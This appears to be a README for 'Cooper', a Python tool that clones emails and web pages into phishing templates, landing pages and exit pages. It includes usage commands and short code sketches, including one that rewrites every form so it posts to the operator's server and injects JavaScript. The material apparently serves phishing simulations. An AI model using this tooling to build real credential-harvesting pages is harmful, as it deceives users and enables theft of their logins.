Cooper - A Python tool for ingesting HTML and producing HTML source suitable for phishing campaigns.

Latest changes:
* Fixed some typos.
* Removed terminal colors until they can be done correctly (not hard coded); they were ugly on Windows.
* Added a new option, -c, to collect just the page source without any processing.
* Phishgates now have their forms modified so they POST to you, and custom JavaScript is inserted for the form.
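The form rewrite described in the last change can be sketched roughly as follows. This is a simplified, hypothetical illustration (the `redirect_forms` helper and the regex approach are not Cooper's actual code), showing the idea of pointing every form's `action` at your own endpoint and injecting custom JavaScript:

```python
import re

def redirect_forms(html, post_url, extra_js=""):
    # Rewrite every form's action attribute so it POSTs to post_url.
    html = re.sub(
        r'(<form\b[^>]*\baction=)(["\']).*?\2',
        lambda m: m.group(1) + m.group(2) + post_url + m.group(2),
        html,
        flags=re.IGNORECASE,
    )
    # Optionally inject custom JavaScript just before </body>.
    if extra_js:
        html = html.replace("</body>", "<script>" + extra_js + "</script></body>")
    return html

page = '<body><form action="/login" method="post"></form></body>'
print(redirect_forms(page, "http://127.0.0.1:8888/catch.php", "console.log('hi');"))
```

A real implementation would use an HTML parser rather than a regex, but the transformation itself is this simple.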

The main script. It may eventually offer a menu with more verbose information, so as to work better as a standalone tool. For now, Cooper has several options for specifying what you need it to do.

Use just one…
-e for Email – Use Cooper’s phishemail.py module. Specify a FILE.
-p for Phishgate – Use Cooper’s phishgate.py module. Specify a URL.
-x for eXit – Use Cooper’s phishexit.py module. Specify a URL.
-n for eNcode – Use Cooper to encode an image file as a Base64 string. Useful for embedding different images into a template or customizing a cloned email/website.
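The `-n` encoding step amounts to Base64-encoding the image bytes and wrapping them in a `data:` URI. A minimal sketch using only the standard library (`encode_image` is an illustrative helper, not Cooper's actual function):

```python
import base64
import mimetypes
import pathlib

def encode_image(path):
    # Read the image bytes and wrap them in a data: URI so the result
    # can be dropped straight into an <img src="..."> attribute.
    data = pathlib.Path(path).read_bytes()
    mime = mimetypes.guess_type(path)[0] or "application/octet-stream"
    return "data:%s;base64,%s" % (mime, base64.b64encode(data).decode("ascii"))

# demo with a throwaway file standing in for a real image
import tempfile
with tempfile.NamedTemporaryFile(suffix=".gif", delete=False) as tmp:
    tmp.write(b"GIF89a")
print(encode_image(tmp.name))
```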

Supported platforms: Windows and Unix

You can also use…
-d for Decode – Indicate an email needs to be decoded and specify the encoding (base64 or quoted-printable).
-u for URL – Specify a URL you want Cooper to use when you need it to fix links for images, CSS, and/or scripts.
-s for Server – Add this when you want Cooper to start the HTTP server. Specify a PORT #.
-h for Help – View this help information.
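The `-d` decoding step can be sketched entirely with the standard library. `decode_email_body` below is a hypothetical helper, not Cooper's actual code; it just shows how the two supported transfer encodings are undone before the HTML can be edited:

```python
import base64
import quopri

def decode_email_body(raw, encoding):
    # Undo the transfer encoding of a saved email body so the HTML
    # inside can be edited; mirrors what -d base64 / -d quoted-printable
    # asks Cooper to do.
    if encoding == "base64":
        return base64.b64decode(raw).decode("utf-8", errors="replace")
    if encoding == "quoted-printable":
        return quopri.decodestring(raw).decode("utf-8", errors="replace")
    raise ValueError("unsupported encoding: " + encoding)

print(decode_email_body(b"SGVsbG8sIHdvcmxkIQ==", "base64"))   # Hello, world!
print(decode_email_body(b"Caf=C3=A9", "quoted-printable"))    # Café
```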

Modules:
+ toolbox.py – The toolbox handles the common tasks, such as retrieving HTML source from files and webpages and starting the HTTP server.
+ phishemail.py – This module handles generating phishing emails. Use -e and feed it a file. Use -d to indicate if decoding is necessary. Use -u to provide a URL for img tags, scripts, and CSS.
+ phishgate.py – This module creates an index.html file suitable as a phishgate (a landing page for the phishing emails). Use -p and feed Cooper a URL or file (coming soon); Cooper outputs an index.html file that can be viewed in your browser via the HTTP server (if you start it).
+ phishexit.py – This module creates an exit page for your phishing campaign. This might be a cloned copy of the phishgate website’s 404 page. Use -x and feed it a URL or file (coming soon).

Usage examples:
Creating an email:
– Get the source of an email to clone and save it to a file.
– Remove the additional text (e.g. delivery information).
– To process an email encoded in base64 with images hosted on www.foo.bar: cooper.py -e email.html -d base64 -u http://www.foo.bar

Creating a phishgate:
– Find a webpage to clone.
– To clone a webpage and view it in your browser: cooper.py -p http://www.foo.bar -s 8888

Creating an exit page:
– Find a URL that pulls up the 404 page of your cloned website.
– To clone the 404 page: cooper.py -x http://www.foo.bar/garbage.php -u http://www.foo.bar

Misc Info:
– URLs are replaced with placeholder text that will do nothing for you; it is specific to the phishing tool Cooper was created to work with. Modify the replaceURL() functions as needed.
– Images are scraped and then encoded in Base64 before being embedded in the template, so the templates do not rely on the original website staying available or keeping its images where they are. If you do not want this, remove the encoding lines from the fixImageURL() functions.
– The HTTP server option is there to enable you to easily review Cooper’s output by hitting 127.0.0.1:PORT. You could just open the index.html, but why would that be cooler than this?
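The review server can be sketched with Python's standard library alone. `serve_output` is an illustrative helper under assumed behavior (the real tool takes `-s PORT`); `port=0` here lets the OS pick a free port for the demo:

```python
import functools
import http.server
import threading

def serve_output(directory=".", port=0):
    # Serve the directory holding Cooper's index.html on 127.0.0.1 in a
    # background thread so the page can be reviewed in a browser.
    handler = functools.partial(
        http.server.SimpleHTTPRequestHandler, directory=directory)
    server = http.server.ThreadingHTTPServer(("127.0.0.1", port), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server  # server.server_address[1] is the chosen port
```

Then browse to http://127.0.0.1:PORT/index.html and call server.shutdown() when finished.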

Setup:
– git clone https://github.com/chrismaddalena/Cooper
– cd Cooper
The setup files are inside the setup directory. Cooper requires several libraries for scraping websites and parsing the HTML. Use pip and the requirements.txt to install the dependencies:
pip install -r requirements.txt
Then check the dependencies by running setup_check.py.

Download : v1.1.0.zip | v1.1.0.tar.gz
Source : https://github.com/chrismaddalena/Cooper